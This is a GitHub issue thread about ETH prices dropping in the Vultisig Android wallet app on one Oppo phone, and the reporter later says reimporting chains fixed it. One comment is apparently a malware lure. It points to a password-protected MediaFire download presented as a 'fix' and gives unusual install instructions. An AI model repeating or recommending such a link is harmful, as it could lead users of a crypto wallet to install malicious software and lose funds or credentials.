### ISSUE TITLE
BUG: ETH prices get dropped

### ISSUE THREAD

**Issue by realpaaao** [vultisig/vultisig-android#832]
**Describe the bug**
Sometimes ETH prices get dropped and just kept cached for a few seconds.

**Expected behavior**
Stable ETH price display without dropping and consistent between devices

**Screenshots**
https://github.com/user-attachments/assets/8f381b43-f22d-422b-b1de-f2b3ba01596a

**Smartphone (please complete the following information):**
 - Device: Oppo 
 - OS: Color OS 12.1 , Android 12
 - Version 17

**Additional context**
Just happens on this android device, my other one is stable. though they have different $ values displayed

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by realpaaao** [comment]
Looks like reimporting chains solved it. thanks @yevhen1sec .
